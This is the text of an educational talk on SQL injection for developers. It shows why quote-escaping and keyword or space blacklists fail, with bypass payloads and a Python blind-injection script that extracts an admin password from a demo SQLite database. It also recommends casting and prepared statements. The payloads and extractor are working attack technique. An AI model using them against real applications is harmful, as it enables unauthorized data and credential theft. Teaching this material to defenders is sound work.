This is a talk geared towards developers who have heard of SQL Injection, but haven't seen it in action, or are unsure about how to do anything about it. Contains demos of what SQL injection looks like, and why escaping quotes is nowhere near sufficient.
15. Easy to find - just put a ' in somewhere
Very common
Usually filtered ineffectively
Only works when you inject BEFORE a where clause
Usually patched quickly
Usually VERY easy to ๏ฌnd abuse in logs
18. Usually found the same way Error-based is
Works when you inject AFTER a where clause
Another tool in your toolbox
Depending on the page, may be able to put multiple injections in one query!
21. Injection without seeing the output
Works by inferring data, not reading it out
Technically a side channel: you learn the data from the page's yes/no behaviour, and in the time-based variant from how long the response takes
Hard to find (for attackers and defenders)
Annoying to exploit
Takes fooooorrrrever
Still works!
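The inference loop the slide is describing, as an added example (not from the talk): a constructed sqlite3 database, a hypothetical endpoint that only ever answers found/not-found, and an attacker-side loop that recovers the admin password one yes/no question at a time without any of it appearing in a response. The table and column names, the sample rows and the `note_exists` endpoint are assumptions made for the demo; the boolean-based form is shown because SQLite has no SLEEP(), so the timing variant is not demonstrated.

```python
import sqlite3

# Constructed demo database, not from the talk: the schema and rows are
# made up so the example runs offline.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("CREATE TABLE notes (id INTEGER, user_id INTEGER, content TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "s3cret"), (2, "bob", "hunter2")])
    db.executemany("INSERT INTO notes VALUES (?, ?, ?)",
                   [(1, 1, "admin's diary"), (2, 2, "bob's todo list")])
    return db


def note_exists(db, note_id):
    """Vulnerable endpoint (hypothetical): note_id is interpolated straight
    into the SQL. The only thing the 'page' reveals is whether a row came
    back, never the row itself, so this is a blind injection target."""
    sql = f"SELECT content FROM notes WHERE id = {note_id}"
    return db.execute(sql).fetchone() is not None


STATS = {"queries": 0}  # how many requests the attacker had to make


def oracle(db, condition):
    """Turn the endpoint into a yes/no oracle: note 1 exists, so the answer
    is True exactly when the injected condition is true."""
    STATS["queries"] += 1
    return note_exists(db, f"1 AND ({condition})")


ADMIN_PW = "(SELECT password FROM users WHERE username = 'admin')"


def extract_length(db, max_len=64):
    """Find length(password) by asking 'is it longer than n?' until the answer is no."""
    n = 0
    while n < max_len and oracle(db, f"length({ADMIN_PW}) > {n}"):
        n += 1
    return n


def extract_char(db, pos):
    """Binary-search one character's code point over printable ASCII (32..126):
    about seven questions per character instead of ninety-five."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(db, f"unicode(substr({ADMIN_PW}, {pos}, 1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_admin_password(db):
    """Recover the secret without a single byte of it appearing in any response."""
    length = extract_length(db)
    return "".join(extract_char(db, pos) for pos in range(1, length + 1))


if __name__ == "__main__":
    db = make_db()
    pw = extract_admin_password(db)
    print(f"recovered {pw!r} in {STATS['queries']} requests")
```

Every character costs around seven round trips even with the binary search, which is the "takes forever" part; on the defender's side that volume of near-identical requests differing only in a number is exactly what to look for in logs.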
27. Let's strip spaces!
$id = escape_spaces("1/**/OR/**/1=1");
"SELECT * FROM table WHERE id = $id";
"SELECT * FROM table WHERE id = 1/**/OR/**/1=1";
The /**/ comment acts like a space, so there was nothing to strip
28. Let's strip out SQL keywords
Don't check for SELECT, INSERT, UNION, etc.
UN/**/ION won't parse in MySQL (the comment is treated as whitespace), but the version comment /*!UNION*/ goes straight through
So does UniOn, if the check is case-sensitive
And you probably didn't cover all keywords anyway
29. Check to see if 'id' is a number?
if (is_numeric($_POST['id']))
9 union all (SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)
Convert to hex...
0x3920756e696f6e20616c6c202853454c4543542047524f55505f434f4e43415428736368656d615f6e616d65292046524f4d20696e666f726d6174696f6e5f736368656d612e736368656d61746129
That's a number! (To PHP 5's is_numeric(), anyway; PHP 7 stopped accepting hex strings. MySQL reads a 0x... literal as a string, so this gets the payload past the check rather than executing it on the spot.)
31. Let's escape quotes!
$id = escape_quotes("1 OR 1=1");
"SELECT * FROM table WHERE id = $id";
"SELECT * FROM table WHERE id = 1 OR 1=1";
There are no quotes in the payload, so there was nothing to escape
32. SELECT *
FROM users
WHERE id = mysql_real_escape_string("1 UNION SELECT id, user_id, content, NULL FROM notes WHERE user_id = 1");
SELECT *
FROM users
WHERE id = 1
UNION
SELECT id, user_id, content, NULL
FROM notes
WHERE user_id = 1
Again nothing in the payload needs escaping, so the UNION goes straight through
33. Works OK if you use single quotes around your variables, though.
$id = escape_quotes("1' OR 1=1");
"SELECT * FROM table WHERE id = '$id'";
"SELECT * FROM table WHERE id = '1\' OR 1=1'";
The injected quote gets escaped, so the whole payload stays inside one string literal and the OR never reaches the parser.
Only as good as your discipline, though: one bare interpolation anywhere and you're back on slide 31.
35. Cast to int / float / whatever
Only works for numbers
SELECT * FROM whatever WHERE id = 'X';
Really solid defense when you can use it
Super easy to add in
36. Prepared Statements
SELECT * FROM users WHERE id=? AND password=?
Can't choose table name in this way
Some limitations with what prepared statements can do
Still could hit a buffer overflow or something
But pretty darn sturdy
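To put slides 27 through 36 side by side, here is an added Python example (not from the talk) that runs the same lookup against a constructed sqlite3 database, first behind each of the deck's blacklist filters and then with the two defenses it recommends. The table, the sample rows and the filter functions (strip_spaces, strip_keywords, escape_quotes) are assumptions for the demo; the PHP is_numeric() hex trick from slide 29 is PHP-specific and is not reproduced. SQLite accepts /**/ comments and case-insensitive keywords just like MySQL, so the bypasses carry over unchanged.

```python
import sqlite3

# Constructed demo database, not from the talk; shaped like the deck's
# users table so the UNION payload lines up with three columns.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "s3cret"), (2, "bob", "hunter2")])
    return db


# ---- The blacklists from slides 27-29 (hypothetical filter functions) ----
def strip_spaces(s):
    return s.replace(" ", "")


def strip_keywords(s):
    # Case-sensitive, which is the bug: "UnIoN" sails through.
    for kw in ("SELECT", "INSERT", "UNION", "OR"):
        s = s.replace(kw, "")
    return s


def escape_quotes(s):
    # Standard SQL quote doubling; mysql_real_escape_string does the same
    # job with backslashes.
    return s.replace("'", "''")


# ---- Query shapes ----
def user_by_id_unquoted(db, user_id):
    """Slides 27-32: value dropped bare into a numeric comparison."""
    return db.execute(
        f"SELECT id, username, password FROM users WHERE id = {user_id}").fetchall()


def user_by_id_quoted(db, user_id):
    """Slide 33: value quoted AND escaped, so it stays one string literal."""
    return db.execute(
        f"SELECT id, username, password FROM users WHERE id = '{escape_quotes(user_id)}'").fetchall()


def user_by_id_cast(db, user_id):
    """Slide 35: cast first; anything that is not an integer raises ValueError
    before it gets anywhere near the database."""
    return db.execute(
        f"SELECT id, username, password FROM users WHERE id = {int(user_id)}").fetchall()


def user_by_id_prepared(db, user_id):
    """Slide 36: parameterized query; the driver never splices text into SQL."""
    return db.execute(
        "SELECT id, username, password FROM users WHERE id = ?", (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(user_by_id_unquoted(db, strip_spaces("1/**/OR/**/1=1")))   # both rows
    print(user_by_id_unquoted(db, strip_keywords(
        "9 UnIoN SeLeCt id, username, password FROM users")))       # both rows
    print(user_by_id_unquoted(db, escape_quotes("1 OR 1=1")))       # both rows: nothing to escape
    print(user_by_id_quoted(db, "1' OR '1'='1"))                    # []: stays inside the string
    print(user_by_id_prepared(db, "1 OR 1=1"))                      # []: compared as a literal value
    try:
        user_by_id_cast(db, "1 OR 1=1")
    except ValueError as e:
        print("rejected by int():", e)
```

The three filters each stop the exact payload they were written against and nothing else; the cast and the parameterized query stop the whole class, because neither lets attacker text reach the SQL parser as SQL.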